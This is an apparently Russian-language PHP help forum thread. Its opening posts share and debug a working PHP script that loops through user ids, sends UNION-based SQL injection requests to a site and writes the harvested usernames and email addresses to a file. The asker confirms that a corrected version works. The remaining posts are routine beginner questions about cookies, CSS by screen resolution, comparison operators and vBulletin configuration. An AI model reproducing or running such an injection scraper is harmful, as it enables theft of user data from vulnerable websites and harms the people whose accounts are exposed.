PHP: <? $handler=fopen('emails.txt','a+'); for($i=1;$i<30;$i++) { $filename = "http://www.mysite.ru/index.php?t=-1+union+select+1,concat(0x2137333621,username,0x3a,email,0x2137333621)+from+users+WHERE+id=$i/*"; echo $i.". "; $str = file_get_contents($filename); if(preg_match('|!736!(.*)!736!|is',$str,$out) == 0) {echo " no mail";} else{ echo " get ".$out[1]; $save = $out[1]."\n"; fwrite($handler,$save); } echo "\n"; } fclose($handler); ?> попробуй так, я пвыпимпши немного, так что ту с регулярками разбираться тоже особо не стал но ты не размышляй над кодом, а сначала попробуй, а потом размышляй
=( не пашет , кстати может я просто в фильтре попутал .. ответ от запроса mysql inj идет следующий.. в тегах <title>root@localhost (Admin:[email protected])</title>
А че ж ты мозги то паришь тогда: PHP: <? $handler=fopen('emails.txt','a+'); for($i=1;$i<30;$i++) { $filename = "http://www.mysite.ru/index.php?t=-1+union+select+1,concat(username,0x3a,email)+from+users+WHERE+id=$i/*"; echo $i.". "; $str = file_get_contents($filename); if(preg_match('|\((.*)\)|is',$str,$out) == 0) {echo " no mail";} else{ echo " get ".$out[1]; $save = $out[1]."\n"; fwrite($handler,$save); } echo "\n"; } fclose($handler); ?> а первый мой код у тебя не работает, потому что ты sql запрос мой исправляешь, причем его (первый вариант) лучше использовать, а вобще действительно как Macro сказал нужна конкретная ссыль, а то так получается "свидание вслепую", я уж не стал тут понармальному делать все просто регулярку подсказал, потому что, без наглядности тут нормально не сделаешь, вобще у тебя в этом скрипте много бесполезных вещей (ну если не много то они все равно есть)
аааааа все народ ооооггггррррооооомммммнннноооооееее спасибо разобрался Scipio - твой первый сткрипт работал , я просто как и сказал mysql запрос забыл поменять .. только сеня заметил как проспался....
Как правильно и наиболее быстро сделать такую операцию: arr[1] = arr[1] + x с проверкой на существование индекса в одну строчку и быстро. Т.к. таких операции должно выполниться очень много и чтобы синтаксис был удобочитаемый. Оптимального решения найти не могу.
Привет... У меня достаточно глуйпый вопрос... кароче я делаю авторизацию на сайте и хочу записать кукисы с логином и паролем если они были правельно введены но пхп выводит сообщение о том что заголовок уже отправлен т.к у меня был первый вывод на 1ой строке <html><body background=s.jpg> но я не могу это убрать т.к это фон страницы ... что мне делать скрипт не пишет куки изза хтмл тэга который незя убирать=)
Гм. Ну либо используй кэширование вывода, либо меняй куки не header'ом, а с помощью html или javascript. Пару страниц назад был такой вопрос и на него достойно ответили
Какой код вписать в index.php чтобы при разрешении юзера 1024х768 грузился 1.css а при 1280х1024 2.css? или это на яве можно как нибудь сделать?
в head прописываешь PHP: <script language="javascript"> if(screen.width=='1280'&&screen.height=='1024'){ document.write('<link rel="stylesheet" type="text/css" href="css1.css">'); }; if(screen.width=='1024'&&screen.height=='768'){ document.write('<link rel="stylesheet" type="text/css" href="css2.css">'); } </script>
на php никак, на JS используй код приведенный Piflit'ом с той лишь разницей, что лучше ставить не равенство а больше или меньше, так как у меня например разрешение 1152х864 и еслиб я зашел на твой сайт то не загрузился бы ни один, ни другой а следовательно я увидил бы полную ересь и тут же вышел бы и никогда бы уже не вернулся...
Вот скрипт PHP-кода, мне нужно чтобы выполнялся блок 'else': <?php $a = 6; if ($a = 5) { echo "Все отлично"; } else { print <<<HERE llsdjhvlshlk dfvsdfvsdfv dsfvdsfvsdfv HERE; } ?> По-идее должно было бы выполняться условие 'else', но оно не выполняется. А вот если поставить $a == 6;, то то тогда уже оно выполняется... Почему такое отличие?
потому что $a = 5 - так ты присваиваешь переменной $a значение 5 и оно возращает ТРУ, поэтому выполняется блок иф а когда ты пишешь if ($a == 5) ты проверяешь равна ли переменная $a 5-и <?php $a = 6; if ($a == 5) { echo "Все отлично"; } else { print <<<HERE llsdjhvlshlk dfvsdfvsdfv dsfvdsfvsdfv HERE; } ?>
= - присвоение переменой какого нибудь значения == - логическое равенства тоесть 0==0 но также 0==false и наприме тут 1==1 но также 1==true ..true - истина ... false - ложь === - это эквилентность с им можно проверить если эта переменая($a) наприер точно ровна этому значению(5) в этом условии 0 не равен false т.к это не одно и тоже *false равен 0 и пустой строке всё остальное это true *эквилентность - это сравнение не только 2 выражений а также их типов
Подскажите пожалуйста, хочу поставить движрк vBulletin 3,6,8 и не могу установить, тпм надо еще что-то в файле config.php менять что? есть инструкция на русском???? Хелп!!!!!
Только что закачивал файл на ДАМП.РУ и там есть прогресбар, тоесть показывает сколько уже байт загрузилось на сервер. Как это делается? И вернее на какой стороне, тоесть это реализуется средствами ПХП или может быть это ява-скрипт.
To4NT1P0V, там если меня память не подводит в папке includes/ файл config.php.new - убираешь расширение new и внутри правишь некоторые опции: т.е. $config['Database']['dbname'] = '' - имя базы данных $config['Database']['tableprefix'] = '' - тут префикс $config['MasterServer']['servername'] = - имя сервера (у тебя вроде localhost) $config['MasterServer']['username'] = ''; - имя пользователя $config['MasterServer']['password'] = ''; - тут пасс, там еще порт для соединения к mysql и т.д. это основные.